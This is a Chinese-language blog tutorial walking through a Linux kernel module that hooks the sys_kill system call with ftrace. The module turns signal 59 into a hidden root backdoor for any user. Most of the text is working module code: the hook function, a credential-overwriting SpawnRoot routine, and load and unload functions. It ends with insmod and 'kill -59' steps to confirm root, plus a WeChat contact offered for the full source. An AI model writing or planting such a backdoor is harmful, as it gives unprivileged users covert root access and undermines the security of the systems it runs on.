在Linux内核开发与安全领域,内核模块(LKM) 是最灵活的扩展方式,而ftrace作为内核原生的跟踪框架,不仅能用于调试,更能安全、高效地实现内核函数拦截。本文将用通俗易懂的语言,从零解读一个基于ftrace挂钩系统调用的内核模块,带你掌握内核函数拦截的核心原理、设计思路与实战技巧。
一、核心概念扫盲
1. 什么是LKM?
LKM 全称 Linux Kernel Module(Linux内核模块),是一段可以动态加载/卸载到Linux内核中的代码,不需要重新编译内核,就能扩展内核功能、修改内核行为,是内核开发最常用的技术。
2. 什么是ftrace?
ftrace 是Linux内核原生自带的跟踪框架,原本用于调试内核、追踪函数调用流程。 它最大的优势:无需修改内核源码、无需硬件断点、安全性远高于传统系统调用表劫持,是目前内核函数拦截的主流方案。
3. 什么是sys_kill?
kill 是我们常用的Linux命令(如kill -9 进程号),它在内核中对应的实现函数就是 sys_kill(x64架构下为__x64_sys_kill)。 这个函数的作用:接收进程号和信号,向指定进程发送信号。我们挂钩这个函数,就能拦截、修改、监听所有进程的信号发送行为。
4. 什么是函数挂钩(Hook)?
简单说:把内核原本的函数“换掉”。 当内核要执行原函数时,先跳转到我们写的自定义函数,我们可以:
二、文章核心:模块整体功能
这个内核模块实现了一个极简的权限提升功能:
- 加载模块后,内核会自动挂钩
sys_kill系统调用; - 当用户执行指令,向任意进程发送信号59时,模块不会发送信号,而是直接将当前进程提升为root权限;
- 卸载模块时,自动恢复内核原函数,无残留、不破坏系统。
三、代码实现原理
整个模块分为两部分:通用ftrace挂钩库 + 业务逻辑代码。
第一部分:ftrace通用挂钩库(底层支撑)
这部分是封装好的工具代码,不用自己手写,作用是简化ftrace的使用,让我们只需要关注“要挂钩哪个函数、要做什么事”。
1. 内核版本兼容处理
Linux 5.7+内核不再直接导出kallsyms_lookup_name(用于查找内核函数地址),代码用kprobe探针绕过限制,保证模块能在新老内核上运行。
2. 核心数据结构:ftrace_hook
structftrace_hook {
constchar *name; // 要挂钩的内核函数名(如__x64_sys_kill)
void *function; // 我们的自定义钩子函数
void *original; // 保存原内核函数的地址
unsignedlong address; // 原函数的内存地址
structftrace_opsops;// ftrace框架的操作句柄
};
这个结构体把挂钩需要的所有信息打包,方便批量管理。
3. 核心工作流程
- 查找函数地址:通过内核符号表,找到要挂钩的系统调用的内存地址;
- 注册ftrace回调:告诉内核——当执行到这个函数时,先通知我;
- 拦截函数执行流:修改指令指针,让内核跳转到我们的钩子函数;
- 递归防护:防止钩子函数自己调用自己,导致内核崩溃;
- 卸载恢复:注销ftrace回调,恢复原函数,内核回归正常。
第二部分:业务逻辑代码
static asmlinkage long(*orig_kill)(const struct pt_regs *);
static asmlinkage inthook_kill(const struct pt_regs *regs){
voidSpawnRoot(void);
int signal;
signal = regs->si;
if(signal == 59){
SpawnRoot();
return0;
}
return orig_kill(regs);
}
voidSpawnRoot(void){
structcred *newcredentials;
newcredentials = prepare_creds();
if(newcredentials == NULL){
return;
}
newcredentials->uid.val = 0;
newcredentials->gid.val = 0;
newcredentials->suid.val = 0;
newcredentials->fsuid.val = 0;
newcredentials->euid.val = 0;
commit_creds(newcredentials);
}
staticstructftrace_hookhooks[] = {
HOOK("__x64_sys_kill", hook_kill, &orig_kill),
};
staticint __init mangekyou_init(void){
int error;
error = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
if(error){
return error;
}
return0;
}
staticvoid __exit mangekyou_exit(void){
fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
}
If you need the complete source code, please add the WeChat number (c17865354792)
这部分是模块的灵魂,实现挂钩kill + 提权的核心逻辑。
1. 定义原函数指针
// 保存内核原生sys_kill函数的地址
static asmlinkage long(*orig_kill)(const struct pt_regs *);
作用:执行完我们的逻辑后,调用原函数,保证系统正常功能不受影响。
2. 自定义钩子函数(核心)
static asmlinkage inthook_kill(const struct pt_regs *regs){
int signal = regs->si; // 从寄存器中取出要发送的信号值
// 如果信号是59,执行提权,不调用原函数
if(signal == 59){
SpawnRoot();
return0;
}
// 其他信号:正常调用原生kill函数
return orig_kill(regs);
}
pt_regs:保存了系统调用的所有寄存器,我们可以从中读取参数(信号、进程号);- 判断逻辑:只有信号=59时触发提权,其他信号正常放行,不影响系统使用。
3. 提权函数SpawnRoot
voidSpawnRoot(void){
structcred *newcredentials = prepare_creds();// 获取当前进程凭证
// 将UID、GID等权限全部设为0(root)
newcredentials->uid.val = 0;
newcredentials->gid.val = 0;
newcredentials->euid.val = 0;
commit_creds(newcredentials); // 提交新凭证,生效提权
}
Linux中,进程的权限由cred(凭证)结构体管理,将其ID改为0,进程就拥有了root权限。
4. 模块加载/卸载
// 加载:安装挂钩
staticint __init mangekyou_init(void){
return fh_install_hooks(hooks, ARRAY_SIZE(hooks));
}
// 卸载:移除挂钩,恢复内核
staticvoid __exit mangekyou_exit(void){
fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
}
四、执行流程原理图
用户执行 kill -59 任意进程
↓
内核准备执行 __x64_sys_kill
↓
ftrace 拦截,跳转到 我们的hook_kill函数
↓
判断信号是否为59
├── 是 → 执行SpawnRoot提权 → 返回,不调用原函数
└── 否 → 调用原生sys_kill → 正常发送信号
↓
操作完成,内核继续运行
五、设计思路与技术要点总结
1. 设计思路
- 安全性优先:放弃传统的修改系统调用表方式,使用ftrace官方框架,不破坏内核结构,不会触发内核保护机制;
- 解耦设计:把ftrace底层操作封装成通用库,业务代码只关注功能逻辑,易扩展、易维护;
- 无侵入性:只拦截指定信号,不影响系统其他功能,卸载后完全恢复;
- 兼容适配:支持Linux 4.17+全版本内核,解决高版本内核符号不导出问题。
六、加载模块(开始测试)
sudo insmod main.ko
没有输出 = 加载成功
测试触发提权(核心功能)
现在,任意普通用户执行:
kill -59 123
(123 可以是任意数字,无所谓)
然后再看自己的权限:
id
你会发现:uid=0(root) gid=0(root)✅ 提权成功!
恢复正常、卸载模块
测试完一定要卸载,避免影响系统:
sudo rmmod main
总结
这是一个入门级、实用性极强的内核函数拦截案例,它没有复杂的逻辑,却覆盖了Linux内核安全、内核开发的核心知识点。
通过这个案例,你可以掌握:
ftrace不仅是调试工具,更是内核安全与扩展开发的利器,掌握它,就打开了Linux内核底层开发的大门。
Welcome to follow WeChat official account【程序猿编码】